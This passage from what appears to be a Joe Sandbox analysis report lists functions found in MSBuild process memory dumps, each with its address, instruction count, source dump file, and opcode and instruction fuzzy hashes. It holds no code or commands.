                              • Instruction ID: c66d844cd502c8ee1ab1479b36b0a96432411411f496c25c9c5ef010c64ada92
                              • Opcode Fuzzy Hash: 9a32fa395261ab795d46f7fe8d32a0b4028d30f72bde5c981d55a1275b5fd5e8
                              • Instruction Fuzzy Hash: 1F31DE71D01218DFDB24EFB8C4456EEBBB2FF49701F10546AD006B6390EB795A45CBA0
                              Function 04E5EF31 Relevance: .1, Instructions: 79COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5352e18800668760937767aec9b9b3a12578dcd0bf49e3a5d9aa7170956e9ef3
                              • Instruction ID: fecef0735627d8e0e113f2d11da5843eea6ee0b2cf32d111e7cc6355b437dd3c
                              • Opcode Fuzzy Hash: 5352e18800668760937767aec9b9b3a12578dcd0bf49e3a5d9aa7170956e9ef3
                              • Instruction Fuzzy Hash: F621CD323003408FD7156F79B448669BFAAEBC562A318047BF805CB291CF71E981C760
                              Function 05B84A98 Relevance: .1, Instructions: 79COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: babce0965918ec52f889107108942720345e02fcba57cd079c3549c330826105
                              • Instruction ID: fd8d115a5f09b7e3b76a2d79ad5051aefa4dbb13557a6904a003014795872e34
                              • Opcode Fuzzy Hash: babce0965918ec52f889107108942720345e02fcba57cd079c3549c330826105
                              • Instruction Fuzzy Hash: 9F31C174E01219DFCB04DFA9D844AEEBBB1FF49301F04906AE915A7360D735A941CFA0
                              Function 00DCD63C Relevance: .1, Instructions: 77COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815250190.0000000000DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DCD000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_dcd000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0602793980a211f8a97feb0d2749c4d85c4afaab3c905342477d8f6856865862
                              • Instruction ID: d338cb542f1c6e3929d34642330c10173737efe8e42ad1591dc9d6c3640d7285
                              • Opcode Fuzzy Hash: 0602793980a211f8a97feb0d2749c4d85c4afaab3c905342477d8f6856865862
                              • Instruction Fuzzy Hash: 4321F472540245DFDF059F50DDC0F16BB66FB88314F24826DE9490B296C336D816CBB1
                              Function 05B3CD39 Relevance: .1, Instructions: 75COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 16ae87e890351ac35d0de2b2570fba955cd3601fa5acd4420b43f7f71f2a6210
                              • Instruction ID: 3e72d91279cae6394181a6b430563c26c6eedb4e2aa06172ca31e2101db815f0
                              • Opcode Fuzzy Hash: 16ae87e890351ac35d0de2b2570fba955cd3601fa5acd4420b43f7f71f2a6210
                              • Instruction Fuzzy Hash: 5C215E75B005158FCB14EF69D986A6EBFF6FF88200B1045A9D84AE7261DB30BD05CB90
                              Function 05B89FFF Relevance: .1, Instructions: 68COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9d54e07a39fe43ff2d7bdde22a4c6412a34bd70ac44f904f84d46ef0df6b8f5f
                              • Instruction ID: 994482ccb5dc12672836ed18e12bd321d497e916e8a87d0f04132c71f2f22bae
                              • Opcode Fuzzy Hash: 9d54e07a39fe43ff2d7bdde22a4c6412a34bd70ac44f904f84d46ef0df6b8f5f
                              • Instruction Fuzzy Hash: 43216AB1E052589FCF08DFA6E8547EDBBB2AF89311F08906AE504B3250D734555ACB64
                              Function 04E5F137 Relevance: .1, Instructions: 67COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ebb2605256f7d4ebd460ea3e4e652f21a43f5662e5fbed0e9fec6beaacd92cf1
                              • Instruction ID: 2a4f8e48975e9bfe8c833965acbd9220fdda0bcb4853a213fc5c783043241cf4
                              • Opcode Fuzzy Hash: ebb2605256f7d4ebd460ea3e4e652f21a43f5662e5fbed0e9fec6beaacd92cf1
                              • Instruction Fuzzy Hash: E41129317082411BD720253ACD407A6AFDFDFC5304F588276AD05C76A2DE24DC41D361
                              Function 04E5F090 Relevance: .1, Instructions: 66COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6b7abb9c75cc994c5b38374939269dfdbccf13b5f34c9f9f94d03c8668116bf9
                              • Instruction ID: 530dbf54fcaaf34e5298192f9e3527f0b2d515e62c6d6c6e448d7dd9cfc75d17
                              • Opcode Fuzzy Hash: 6b7abb9c75cc994c5b38374939269dfdbccf13b5f34c9f9f94d03c8668116bf9
                              • Instruction Fuzzy Hash: 9411B2317047009FD7359F75E880A53BBAAEF85328B18857AE94A8B626CB31FC85C750
                              Function 04E5BF31 Relevance: .1, Instructions: 66COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 312d114df8609109507eea4ba8ddaeab815ef39f23227a19bbd37b02c1a648ff
                              • Instruction ID: 55d5c1226817074d5fa902b28ec24308d9f6f83b7073cb92adc1090eb0c39156
                              • Opcode Fuzzy Hash: 312d114df8609109507eea4ba8ddaeab815ef39f23227a19bbd37b02c1a648ff
                              • Instruction Fuzzy Hash: CB1106716007158FDB20DF64D894A1A7BB5FFC8224700452CE90A8B350DB71FC008BA1
                              Function 04E5AF30 Relevance: .1, Instructions: 64COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cbf315e8ce98fc3e46305797580b4847889dc54022e5694ca4d2526bb70f9ced
                              • Instruction ID: 8fcb00b73264fda5a924a87ed3ed76c419ec43a01939ab605709a1fc55cf03d7
                              • Opcode Fuzzy Hash: cbf315e8ce98fc3e46305797580b4847889dc54022e5694ca4d2526bb70f9ced
                              • Instruction Fuzzy Hash: 92116A316047108FCB25DF64D884A6EBBE6EF893607598969E84A9B351DB30FC018BA1
                              Function 05B87E08 Relevance: .1, Instructions: 64COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6cb639d7713a19459115dc36f37176c1bcc50e6eebd845a19433169a1e4be907
                              • Instruction ID: f460864c4f253b634cbcac721916d3c6af2f65435fad087ec88d8a8c5151d770
                              • Opcode Fuzzy Hash: 6cb639d7713a19459115dc36f37176c1bcc50e6eebd845a19433169a1e4be907
                              • Instruction Fuzzy Hash: 55110632A0C3514FC726EB79D81462E7BFAEF8561131884AFD046D7241EE35A844CBA5
                              Function 05B84A8A Relevance: .1, Instructions: 61COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 593b7def2677e0ba24000dc3fe0f588589b45a1e685e02ea831ba26c9dbdf8f8
                              • Instruction ID: 67d5a1c4fff892af3386fe5041c5a346df4c1f4fabef2ac351c931114e920f37
                              • Opcode Fuzzy Hash: 593b7def2677e0ba24000dc3fe0f588589b45a1e685e02ea831ba26c9dbdf8f8
                              • Instruction Fuzzy Hash: 72210475E01219DBCB04DFA5D844AEEBBB5FB49305F0490AAD411A7360D7396901CFA4
                              Function 04E5D2E8 Relevance: .1, Instructions: 58COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7cd5d6c98929f9b4cb9a4b03c09d32f56d51b7cb491f982719cfeaef10eeff04
                              • Instruction ID: a60874ace070705fbe47ea007d82f6b0127e0cebf50325e83e0120e3bb02fbe3
                              • Opcode Fuzzy Hash: 7cd5d6c98929f9b4cb9a4b03c09d32f56d51b7cb491f982719cfeaef10eeff04
                              • Instruction Fuzzy Hash: CE115B71A006199BCF14DF59C8C0CAEBBBAFF843147548969D909DB261DB30F810CBA0
                              Function 05B88120 Relevance: .1, Instructions: 58COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 386ab4771591b64a8370edf7fa34fe1276c13b444ff820faea91a60c67bb9605
                              • Instruction ID: 30abda50b58d229ad93e76caaaa01450e04d1f6952cb4dc13b08d7156d39eb86
                              • Opcode Fuzzy Hash: 386ab4771591b64a8370edf7fa34fe1276c13b444ff820faea91a60c67bb9605
                              • Instruction Fuzzy Hash: 6811CA30609388DFCB06DB74E8549AC7FB5EF4A211B1504DBE44AC7752CE359D06D761
                              Function 00DCD637 Relevance: .1, Instructions: 58COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815250190.0000000000DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DCD000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_dcd000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dc3560dc824a756a5356b05b1d203d9ef1e49879a247c8f5d21cd0ce87d99520
                              • Instruction ID: 4cb5758a2ee1cb727becf3a3f57384efb9c3ca58cd62f5e6608ea471b4eaa342
                              • Opcode Fuzzy Hash: dc3560dc824a756a5356b05b1d203d9ef1e49879a247c8f5d21cd0ce87d99520
                              • Instruction Fuzzy Hash: ED21AF76504284DFCF06CF10D9C4B56BF72FB88314F2886ADE9490B656C33AD866CBA1
                              Function 04E5B247 Relevance: .1, Instructions: 57COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cbe0164fe0ffcc69b37009447f72de6c4554d7ffa1919ecfca7fb8acc41e7df3
                              • Instruction ID: 91530d37720927916c7e85fc2a5c7a71f87ce6163b49af23be9b6816804f9cb0
                              • Opcode Fuzzy Hash: cbe0164fe0ffcc69b37009447f72de6c4554d7ffa1919ecfca7fb8acc41e7df3
                              • Instruction Fuzzy Hash: C61190312007459FC722DF24D84094ABBB6FFC5214314CA6DE05A8B292DB71EE0ADBD2
                              Function 04E5BF40 Relevance: .1, Instructions: 57COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 90055c920af8ffef228089b636423b4e43850b67af89ec8e84243ebd8af123d3
                              • Instruction ID: a330f442d56b58635d6f309feb2be5bf4ae933a7a558f2e107dea3aa98c9a963
                              • Opcode Fuzzy Hash: 90055c920af8ffef228089b636423b4e43850b67af89ec8e84243ebd8af123d3
                              • Instruction Fuzzy Hash: 2411A0717007168FDB20DF69E884A2AB7B6FFC8214710462CE9068B304DB75EC118BA5
                              Function 05B3EA42 Relevance: .1, Instructions: 56COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1904de03e8d773fd40d428e8de7acff2b684e1425d117f712479f4e6ec1e3bf4
                              • Instruction ID: 91b22d0525ff0ebe4ed07119a47e0fcf20413798de2043ea96301584f9748010
                              • Opcode Fuzzy Hash: 1904de03e8d773fd40d428e8de7acff2b684e1425d117f712479f4e6ec1e3bf4
                              • Instruction Fuzzy Hash: CD11C0723482499BDB108A58C842F7A77ABFBD5210F5981EBE905AB251DA31F8429790
                              Function 05B3B269 Relevance: .1, Instructions: 53COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ef89dba1df13c3f8c8ff6b34933880eb0773714fef8abd45c23142320d9d0740
                              • Instruction ID: 97421a2c15b37673b791f6a916ae5ff89c452643fa0de04d0319456043eab6df
                              • Opcode Fuzzy Hash: ef89dba1df13c3f8c8ff6b34933880eb0773714fef8abd45c23142320d9d0740
                              • Instruction Fuzzy Hash: C011D676A0431ACFCB05CFA4E9455AEBFB6FF8C310B14856AE549E7354DA309905CBA0
                              Function 05B89548 Relevance: .1, Instructions: 52COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 915854358c2094145ca3de527629d1ee6012661f14c9857180eccbb8a8056fe6
                              • Instruction ID: 6fe27bee876eb7c507a9acf8bd9e1f11275987e1d5ccc8003deec1afe8f2fc40
                              • Opcode Fuzzy Hash: 915854358c2094145ca3de527629d1ee6012661f14c9857180eccbb8a8056fe6
                              • Instruction Fuzzy Hash: E01113B5200A009FD764CB28C484F72B7F5FB88718F14959DE44A87B61C631F80ACB90
                              Function 05B87F18 Relevance: .1, Instructions: 51COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 333ae8df8b1381618c7ec935d0b203be7379148a166de3b3ada528223dc86fa5
                              • Instruction ID: f4aaa24a89498a179bd6d372b64754bc3f6a6c41d53e590cb6c97790d16d4f13
                              • Opcode Fuzzy Hash: 333ae8df8b1381618c7ec935d0b203be7379148a166de3b3ada528223dc86fa5
                              • Instruction Fuzzy Hash: F40152313055408FC744DB7AE444A7A7BE6FF89655B2590E9E40ACB761DE31EC02CB61
                              Function 05B3B278 Relevance: .0, Instructions: 50COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 56f7e637ab1ff73012c427370ac902a986e19f1e76f6a98e3bc9a1ac3f5b7188
                              • Instruction ID: 81514c9611a1db76f3eb17f30f21a0358a4394f3b9d798c13c9efe8e65896259
                              • Opcode Fuzzy Hash: 56f7e637ab1ff73012c427370ac902a986e19f1e76f6a98e3bc9a1ac3f5b7188
                              • Instruction Fuzzy Hash: 3A016D35B0021A9FCB04DFA4D8498AFBFBAFF88310B108569E509D7314DB309902CBD1
                              Function 04E5AF22 Relevance: .0, Instructions: 49COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cfbbb7abb8815f1f689947a3af352c4b15f8044ead5430dc35b2965207d51eff
                              • Instruction ID: dd47fd6886e5f92559c2045620a20e63775079319f2abcdc1843baf9d8a81247
                              • Opcode Fuzzy Hash: cfbbb7abb8815f1f689947a3af352c4b15f8044ead5430dc35b2965207d51eff
                              • Instruction Fuzzy Hash: 35014C716016108FCB60CF15D984A6ABBEAEB88725719C679EC099B321D730FC008BA0
                              Function 05B3D240 Relevance: .0, Instructions: 49COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 24edb073f2ed621d70a0e5f264b82f2c204a52fe4387a789386aacbe4bb80f11
                              • Instruction ID: afcb49b899e4ef3854cdac8892aaf0d86cfe110cb014fad519f3b6bdcc40e2a4
                              • Opcode Fuzzy Hash: 24edb073f2ed621d70a0e5f264b82f2c204a52fe4387a789386aacbe4bb80f11
                              • Instruction Fuzzy Hash: 60012632B046354F8B24AB69D941A3FB3DAFF88A903050699D809BB341DF34FC0187E1
                              Function 05B851A0 Relevance: .0, Instructions: 47COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: da55e87904b85a6d0a69b8f1751b20a4c71e16c4529dcc746df627c62fbc53ab
                              • Instruction ID: 1e755bb112fe28914b15dc23e1250dd4378c7356d7d384d63d9f9a51efcb2104
                              • Opcode Fuzzy Hash: da55e87904b85a6d0a69b8f1751b20a4c71e16c4529dcc746df627c62fbc53ab
                              • Instruction Fuzzy Hash: 1A119DB4D05209EFCB45DFA9D840AAEBBF1FB49300F1085AAD814A3350E3746A45CF91
                              Function 05B84B8A Relevance: .0, Instructions: 47COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a02f78859047fe94e6d54b53a29b26481760aeb33918fbad76ac3a3d29e22428
                              • Instruction ID: 86b52c56e45dbbd20b77059da4b70a57f2d61e6512e6057f3ad4bcbe20375a49
                              • Opcode Fuzzy Hash: a02f78859047fe94e6d54b53a29b26481760aeb33918fbad76ac3a3d29e22428
                              • Instruction Fuzzy Hash: 7E1102B4C0521ADFCB44EFAAD8493AEBFF5BF48304F1494AAD419A2350E7785640CF90
                              Function 05B89558 Relevance: .0, Instructions: 46COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 81cc51c32ac268b1720a95c3ff773d3f9a92b34682b89b4bffde8c2c7cf68fe4
                              • Instruction ID: a74f16fbd15036d6adaee21af2ce10f07070f0ea69a94dc2a8960b3fe85a6d6f
                              • Opcode Fuzzy Hash: 81cc51c32ac268b1720a95c3ff773d3f9a92b34682b89b4bffde8c2c7cf68fe4
                              • Instruction Fuzzy Hash: C8111575200B009FD764DB29C484E32B7F5FF89714F14959DE48A87B62C671F849CB50
                              Function 05B3DFD0 Relevance: .0, Instructions: 46COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d495e774fb33bbffc8849b3d8836a0144358e9e9ae68f50043cc2a4e4970f6b4
                              • Instruction ID: 68caa4ad4dc094ef45be6d9c09ee4bb49cdff0d0b06f1e1a2ac35820b2891947
                              • Opcode Fuzzy Hash: d495e774fb33bbffc8849b3d8836a0144358e9e9ae68f50043cc2a4e4970f6b4
                              • Instruction Fuzzy Hash: 11F062333042186B5B14EA59AC95DBFBBEEFBC8264714456FF909D3200DB32EC059B64
                              Function 00DCD921 Relevance: .0, Instructions: 45COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815250190.0000000000DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DCD000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_dcd000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d4117c18034bdad315a716db810ad2c89486ff5b294002c1d689d61be9d47397
                              • Instruction ID: 4861cd4c96b7f03593d863e5653bdfe10f47d6e4cfd4104a6a012fc8d4d7e397
                              • Opcode Fuzzy Hash: d4117c18034bdad315a716db810ad2c89486ff5b294002c1d689d61be9d47397
                              • Instruction Fuzzy Hash: 4C01F2351083419BE7108E21CD80F26BB98EF41320F18C42EED895B282CA79D800CEB2
                              Function 04E5E1A9 Relevance: .0, Instructions: 43COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 845df413fe5215af5119dd5f4e162393c32335f9d2bf65e46fdc544fa6f67e4d
                              • Instruction ID: a543916ef168ad5142e12e7ef3e02a224e21299a0592694e4302e5c11252a70b
                              • Opcode Fuzzy Hash: 845df413fe5215af5119dd5f4e162393c32335f9d2bf65e46fdc544fa6f67e4d
                              • Instruction Fuzzy Hash: CA01F432204345AFD711DBA8DC4089F7BB9FF49314704952AE549CB261EB31E901CBA1
                              Function 04E5E1B8 Relevance: .0, Instructions: 43COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 150c548cff89536090217252fd8c4a1c770184a42adf51c3eafdcfa20885eb87
                              • Instruction ID: c7213603b9d22d2ffa044b4abcb7e6e753075d14dc8fb114cc9b0faebd9f16fe
                              • Opcode Fuzzy Hash: 150c548cff89536090217252fd8c4a1c770184a42adf51c3eafdcfa20885eb87
                              • Instruction Fuzzy Hash: AFF04433204219AF9715DBA9EC40D9FB7A9FB88364700853AE518C7150EB32E911D7A1
                              Function 05B851B0 Relevance: .0, Instructions: 43COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 30fe187a4c7ebc862185aec3392c5c631fc806fcff04fd765bb14f8d668eb1f3
                              • Instruction ID: 6429bc1776ab994eeab41ac8c91ddf0b92d4a30047af9e7a0974c15a28ea6eb9
                              • Opcode Fuzzy Hash: 30fe187a4c7ebc862185aec3392c5c631fc806fcff04fd765bb14f8d668eb1f3
                              • Instruction Fuzzy Hash: F9117CB4D05209EFCB44DFA9C840AAEBBB1FB48300F1085AAD814A3350E3745A45DF91
                              Function 05B87DF9 Relevance: .0, Instructions: 43COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4a1d0a307d51c3ff690e19c33a647ded5406ede8092251654c4e7e1cce44c249
                              • Instruction ID: 7777cfe24acd9e5e390a9620656a0230bb3c29a5b048edc927a8e28bdc299f18
                              • Opcode Fuzzy Hash: 4a1d0a307d51c3ff690e19c33a647ded5406ede8092251654c4e7e1cce44c249
                              • Instruction Fuzzy Hash: 98F0D1326043056BCB25D72AC84467A77FEEF84615B14A46AE106D2600EF72F801DBA5
                              Function 05B895F1 Relevance: .0, Instructions: 43COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1f602410c110d3454d3c30b44731b1853851942f9e86e79a7e4684a2ad3b6749
                              • Instruction ID: c17f375f287006346c7fa1e00c2fc7c96e75583ddf88e91577abf342d89133cb
                              • Opcode Fuzzy Hash: 1f602410c110d3454d3c30b44731b1853851942f9e86e79a7e4684a2ad3b6749
                              • Instruction Fuzzy Hash: 72014476600A09AFC314CF69C480A56F7F4FB88320F14C52AE8298B760DB32F815CBA0
                              Function 04E5B042 Relevance: .0, Instructions: 42COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 80ca647243e2d8a493d5d346728140cb734f2268eb8b952756ba21635796861b
                              • Instruction ID: c6b8964f26d19af67ead5c85a6f4ecc8b241abd653ea4bb7f661822690092f53
                              • Opcode Fuzzy Hash: 80ca647243e2d8a493d5d346728140cb734f2268eb8b952756ba21635796861b
